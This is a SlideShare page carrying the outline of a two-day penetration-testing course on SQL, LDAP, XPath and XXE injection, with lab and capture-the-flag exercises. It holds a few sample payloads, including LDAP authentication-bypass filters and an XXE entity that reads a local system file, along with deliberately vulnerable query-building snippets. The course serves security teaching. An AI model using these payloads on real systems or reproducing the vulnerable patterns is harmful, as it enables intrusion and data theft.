SlideShare a Scribd company logo
The Art Of Exploiting
Injection Flaws
Sumit Siddharth
sid@notsosecure.com
About the course
 Hands on 2 days training
 Require out of box thinking (strong coffee
recommended!)
 20 exercises, 100 slides, 8 CTFs!
 Previous feedback:
 “ This was the best course I have ever been on. Since attending
the course, I have identified so many issues which automated
tools have missed. Thanks a ton, Sid”
 “I have been pentesting for 4 years now, and thought I knew all
about SQLI. I guess I was wrong. If anyone knows this subject
well, it is Sid”
About Me
Sumit “sid” Siddharth
 Speaker/Trainer at Black Hat, Def con,
OWASP Appsec, HITB, Ruxcon etc
 My blog: www.notsosecure.com
 Specialist in Application & Database Security!
 More than 8 years of Pentesting!
 Co-author: SQL Injection, attacks and defense
 Head of Penetration testing@7Safe
Day 1: SQL Injection
Exploiting SQL Injections
 Authentication Bypass
 Extracting Data
 Error Message Enabled
 Error Message Disabled
 Union Injection
 Blind Injection
 Time Delays
 Out Of Band Channels
 Privilege Escalation
 OS code execution
Exercise 9.8 – SQL Injection: OS command
execution
 http://hacklab.net/hackme_7.5/
 Objective
 Exploit SQL injection to run OS commands on the database
server
 CTF : What are the contents of C:secret.txt on the server
 Time
 10 mins
Advanced SQL Injection
 Insanely Blind SQL Injection
 Application returns same response
 Injection point in INSERT/UPDATE statement
Encoding/Decoding User Input
 Base64 decoding user input
 Hex decoding user input
 Real world examples
 WordPress Admin-Ajax.php unauthenticated SQL injection
 PHP-Nuke auth.php
$cookie=explode(„;‟, urldecode(empty($_POST[„cookie‟])))
$admin=base64_decode($admin)
SQL Injection in SQL Names
 Consider the following:
Dim cat, orderBy, query
cat = Replace(Request.Form(“cat”), “‟”, “‟‟”)
orderBy = Replace(Request.Form(“orderBy”), “‟”, “‟‟”)
query = “SELECT * FROM prod WHERE cat = „” & cat &
“‟ ORDER BY “ & orderBy
Hacking Oracle from Web
 Exploiting SQL Injection against oracle database
 How to extract data
 One Query to get them all!
 How to execute OS code
 What if we are not DBA
 Become DBA
 Execute OS code
 Drop DBA
Capture The Flag: SQL Injection
 http://hacklab.net/ctf.asp?data=foobar
 Objective
• What’s in C:secret.txt
 Time
 20 Mins!
 No instructions or hints this time!
Day 2: The Art of Exploiting
Lesser Known Injection Flaws
ORM Injection
LDAP Injection
Advanced LDAP Injection
XPath Injection
Xpath v2
XML Entity Injection
Combining Xpath and XXE
CTF
Q&A
Hibernate Query Language Injection
 User’s input to be passed directly to the
underlying SQL engine
List<Event> result = session.createQuery(
"from Event e where e.title='" + param +
"'").list();
HACKING LDAP
LDAP overview
LDAP injection
Blind LDAP injection
Hacking LDAP in practice
Securing Applications Against LDAP
Injections
LDAP Injection: Authentication Bypass
 (&(user=username)(password=pwd))
 Usually password is hashed and then matched with the
stored value
 Injection is most likely to work only in username field
 (&(user=username)(password=*))
 (&(user=username)(&))(password=pwd))
Anything after first filter will be
ignored by OpenLDAP
Exercise 6
 http://hacklab2.net:81/ldap/selfservice/
 PHP/LDAP
 Find the telephone number of employee Eric
Philip
 Time: 10 mins
XPATH Injection
 Agenda
 What is XPATH
 Exploiting XPATH
 Impact of XPATH exploitation
 Blind XPATH Injection
 Automating XPATH Injection
 XPATH v2 injection
 Insane XPATH Injection
 Defending against XPATH Injection
XPATH’s XML Nomenclature
Root node
Comment
Node name
Attribute value
Node
Node value
Attribute name
Node
Automating Xpath
 XPATH Explorer
 Demo time!
 Hugely increased feature set
 Regular expressions
 Unicode normalization
 String to code point conversion
 Remote document references
 All of these can be utilised to speed up document
retrieval and reduce the key space we have to search.
XPath 2.0 Features..
XPATH 2.0
 Allows to not just read the current XML file but any
arbitrary xml file on the file system.
Hacking Web Services with XML External Entity
 Not validating the xml files before processing it
 Attacker can inject an external entity
 <!ENTITY pwned SYSTEM "file:///c:/boot.ini" >
 Web service parse the entity and the parser
access the local resource
 Unauthorized access to information
 Post scanning
 Denial of service attack
 Breaking the xml syntax
 Providing files like /dev/urandom
Combining XXE and Xpath
 Did I say, with Xpath 2.0 you can read arbitrary xml
files on the file system.
 I actually mean:
 with Xpath 2.0 you can read arbitrary xml files on the file
system.
 Introducing Xcat
Thank You!
 Questions please...
 Sid@notsosecure.com
 Twitter: notsosecure

More Related Content

What's hot

The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
EC-Council
 
NoSQL Exploitation Framework
NoSQL Exploitation FrameworkNoSQL Exploitation Framework
NoSQL Exploitation Framework
Francis Alexander
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit Giri
OWASP Delhi
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
Iftach Ian Amit
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
SecuRing
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
Mike Felch
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
nettitude_labs
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
Mike Felch
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
Will Schroeder
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Priyanka Aash
 

What's hot (20)

The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
 
NoSQL Exploitation Framework
NoSQL Exploitation FrameworkNoSQL Exploitation Framework
NoSQL Exploitation Framework
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit Giri
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 

Viewers also liked

масштаб
масштабмасштаб
масштаб
bk-kris
 
Why Local Social? October 2013
Why Local Social? October 2013Why Local Social? October 2013
Why Local Social? October 2013
Engage121
 
맞춤형 창업특강 11월
맞춤형 창업특강 11월맞춤형 창업특강 11월
맞춤형 창업특강 11월
Woonghee Lee
 
Power point tour shape editing
Power point tour shape editingPower point tour shape editing
Power point tour shape editing
Osama Adel
 
1. bullying aproximacion al fenomeno onederra
1. bullying aproximacion al fenomeno onederra1. bullying aproximacion al fenomeno onederra
1. bullying aproximacion al fenomeno onederra
Flakoo Nganga
 
Why Local Social? - November 2013
Why Local Social? - November 2013Why Local Social? - November 2013
Why Local Social? - November 2013
Engage121
 
Wk4
Wk4Wk4
E121 local social marketing (complete)
E121 local social marketing (complete)E121 local social marketing (complete)
E121 local social marketing (complete)
Engage121
 
Engage121 overview of campaigns - june 2014
Engage121   overview of campaigns - june 2014Engage121   overview of campaigns - june 2014
Engage121 overview of campaigns - june 2014
Engage121
 
Presentation1
Presentation1Presentation1
Presentation1
Relyn Estacion
 
признаки делимости
признаки делимостипризнаки делимости
признаки делимости
bk-kris
 
Credit and background info
Credit and background infoCredit and background info
Credit and background info
Christopher Shearer
 
El62013
El62013El62013
El62013
ksanhn
 
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets) Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121
 
Trabajando con nuevos enfoques ...
Trabajando con nuevos enfoques ...Trabajando con nuevos enfoques ...
Trabajando con nuevos enfoques ...
APOYO Escolar _en línea
 
11810個人報告
11810個人報告11810個人報告
11810個人報告
怡妏 劉
 
Presentation3
Presentation3Presentation3
Presentation3
Relyn Estacion
 
Engage121 overview latest june 2014
Engage121 overview latest june 2014Engage121 overview latest june 2014
Engage121 overview latest june 2014
Engage121
 

Viewers also liked (18)

масштаб
масштабмасштаб
масштаб
 
Why Local Social? October 2013
Why Local Social? October 2013Why Local Social? October 2013
Why Local Social? October 2013
 
맞춤형 창업특강 11월
맞춤형 창업특강 11월맞춤형 창업특강 11월
맞춤형 창업특강 11월
 
Power point tour shape editing
Power point tour shape editingPower point tour shape editing
Power point tour shape editing
 
1. bullying aproximacion al fenomeno onederra
1. bullying aproximacion al fenomeno onederra1. bullying aproximacion al fenomeno onederra
1. bullying aproximacion al fenomeno onederra
 
Why Local Social? - November 2013
Why Local Social? - November 2013Why Local Social? - November 2013
Why Local Social? - November 2013
 
Wk4
Wk4Wk4
Wk4
 
E121 local social marketing (complete)
E121 local social marketing (complete)E121 local social marketing (complete)
E121 local social marketing (complete)
 
Engage121 overview of campaigns - june 2014
Engage121   overview of campaigns - june 2014Engage121   overview of campaigns - june 2014
Engage121 overview of campaigns - june 2014
 
Presentation1
Presentation1Presentation1
Presentation1
 
признаки делимости
признаки делимостипризнаки делимости
признаки делимости
 
Credit and background info
Credit and background infoCredit and background info
Credit and background info
 
El62013
El62013El62013
El62013
 
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets) Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
 
Trabajando con nuevos enfoques ...
Trabajando con nuevos enfoques ...Trabajando con nuevos enfoques ...
Trabajando con nuevos enfoques ...
 
11810個人報告
11810個人報告11810個人報告
11810個人報告
 
Presentation3
Presentation3Presentation3
Presentation3
 
Engage121 overview latest june 2014
Engage121 overview latest june 2014Engage121 overview latest june 2014
Engage121 overview latest june 2014
 

Similar to Injection flaw teaser

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
Kevin Kline
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
SharePointRadi
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection  How to identify and prevent SQL injection
How to identify and prevent SQL injection
Eguardian Global Services
 
SQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupSQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity Meetup
Janith Malinga
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
Caleb Sima
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
Nazar Tymoshyk, CEH, Ph.D.
 
Google Dorks and SQL Injection
Google Dorks and SQL InjectionGoogle Dorks and SQL Injection
Google Dorks and SQL Injection
Mudassir Hassan Khan
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
n|u - The Open Security Community
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Network security
Network securityNetwork security
NetworkSecurity
NetworkSecurityNetworkSecurity
NetworkSecurity
Peter Lawrence
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
Sqreen
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Nipun Jaswal
 
Hackers vs developers
Hackers vs developersHackers vs developers
Hackers vs developers
Soumyasanto Sen
 

Similar to Injection flaw teaser (20)

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection  How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
SQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupSQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity Meetup
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
 
Google Dorks and SQL Injection
Google Dorks and SQL InjectionGoogle Dorks and SQL Injection
Google Dorks and SQL Injection
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
Network security
Network securityNetwork security
Network security
 
NetworkSecurity
NetworkSecurityNetworkSecurity
NetworkSecurity
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Hackers vs developers
Hackers vs developersHackers vs developers
Hackers vs developers
 

Recently uploaded

The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
Razin Mustafiz
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
DianaGray10
 
Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
ZachWylie3
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
maigasapphire
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
Zilliz
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
Zilliz
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
ankush9927
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
bhumivarma35300
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
ldtexsolbl
 
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Zilliz
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
Brian Pichman
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
SynapseIndia
 
kk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdfkk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdf
KIRAN KV
 
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdfLeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
SelfMade bd
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
Arpan Buwa
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
SynapseIndia
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
Steven Carlson
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
Ivanti
 

Recently uploaded (20)

The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
 
Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
 
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
Garbage In, Garbage Out: Why poor data curation is killing your AI models (an...
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
 
kk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdfkk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdf
 
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdfLeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
 

